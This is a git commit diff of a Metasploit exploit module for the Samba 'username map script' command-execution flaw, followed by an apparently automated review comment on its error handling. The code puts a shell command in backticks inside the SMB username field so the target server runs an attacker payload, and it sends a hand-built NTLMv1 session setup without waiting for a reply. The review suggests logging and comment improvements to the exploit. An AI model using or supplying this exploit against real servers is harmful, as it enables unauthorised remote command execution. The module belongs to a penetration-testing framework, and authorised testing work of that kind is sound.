yield the session faster by not waiting for a response
git-svn-id: file:///home/svn/framework3/trunk@9911 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
6e34bc5420
commit
84e3a95d2b
@ -16,6 +16,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
include Msf::Exploit::Remote::SMB
|
||||
|
||||
# For our customized version of session_setup_ntlmv1
|
||||
CONST = Rex::Proto::SMB::Constants
|
||||
CRYPT = Rex::Proto::SMB::Crypt
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Samba "username map script" Command Execution',
|
||||
|
@ -65,27 +69,68 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
Opt::RPORT(139)
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def smb_login
|
||||
# lol?
|
||||
username = "/=`nohup " + payload.encoded + "`"
|
||||
begin
|
||||
simple.login_split_start_ntlm1(datastore['SMBName'])
|
||||
simple.login_split_next_ntlm1(username, datastore['SMBDomain'], rand_text(8), rand_text(8))
|
||||
rescue XCEPT::LoginError => e
|
||||
print_error("#{e}")
|
||||
|
||||
# Authenticate using NTLMv1
|
||||
def session_setup_ntlmv1(user = '', pass = '', domain = '')
|
||||
|
||||
raise XCEPT::NTLM1MissingChallenge if not self.simple.client.challenge_key
|
||||
|
||||
if (pass.length == 65)
|
||||
hash_lm = CRYPT.e_p24( [ pass.upcase()[0,32] ].pack('H42'), self.simple.client.challenge_key)
|
||||
hash_nt = CRYPT.e_p24( [ pass.upcase()[33,65] ].pack('H42'), self.simple.client.challenge_key)
|
||||
else
|
||||
hash_lm = pass.length > 0 ? CRYPT.lanman_des(pass, self.simple.client.challenge_key) : ''
|
||||
hash_nt = pass.length > 0 ? CRYPT.ntlm_md4(pass, self.simple.client.challenge_key) : ''
|
||||
end
|
||||
|
||||
data = ''
|
||||
data << hash_lm
|
||||
data << hash_nt
|
||||
data << user + "\x00"
|
||||
data << domain + "\x00"
|
||||
data << self.simple.client.native_os + "\x00"
|
||||
data << self.simple.client.native_lm + "\x00"
|
||||
|
||||
pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct
|
||||
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
|
||||
|
||||
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_SESSION_SETUP_ANDX
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
||||
pkt['Payload']['SMB'].v['WordCount'] = 13
|
||||
pkt['Payload'].v['AndX'] = 255
|
||||
pkt['Payload'].v['MaxBuff'] = 0xffdf
|
||||
pkt['Payload'].v['MaxMPX'] = 2
|
||||
pkt['Payload'].v['VCNum'] = 1
|
||||
pkt['Payload'].v['PasswordLenLM'] = hash_lm.length
|
||||
pkt['Payload'].v['PasswordLenNT'] = hash_nt.length
|
||||
pkt['Payload'].v['Capabilities'] = 64
|
||||
pkt['Payload'].v['SessionKey'] = self.simple.client.session_id
|
||||
pkt['Payload'].v['Payload'] = data
|
||||
|
||||
self.simple.client.smb_send(pkt.to_s)
|
||||
|
||||
# We don't care how the server responds, we should have a session already :)
|
||||
# And such is our leet customization.
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
# lol?
|
||||
username = "/=`nohup " + payload.encoded + "`"
|
||||
begin
|
||||
simple.client.negotiate(false)
|
||||
session_setup_ntlmv1(username, rand_text(16), datastore['SMBDomain'])
|
||||
rescue ::Timeout::Error, XCEPT::LoginError
|
||||
# nothing
|
||||
end
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
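Review bot: In `exploit`, the `rescue ::Timeout::Error, XCEPT::LoginError` block with only `# nothing` in it swallows a failed `negotiate` as well as the deliberately-unread session setup, so a target that never completed negotiation still falls through to `handler` with no output. Since `session_setup_ntlmv1` no longer reads a reply, a timeout or login error at this point is informative rather than expected noise; I would bind the exception and report it: `rescue ::Timeout::Error, XCEPT::LoginError => e` / `print_error("Session setup failed: #{e}")`. It would also help a reader if the header comment on `session_setup_ntlmv1` said explicitly that the method only sends the SESSION_SETUP_ANDX request and returns without reading the response, and why the `pass.length == 65` hash branch is kept when `exploit` always passes `rand_text(16)`. I cannot tell from this rendering which of the `smb_login` lines near the top of the hunk survive on the new side, so if `smb_login` and its `print_error` are gone, the same logging concern applies only to `exploit`.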
|
||||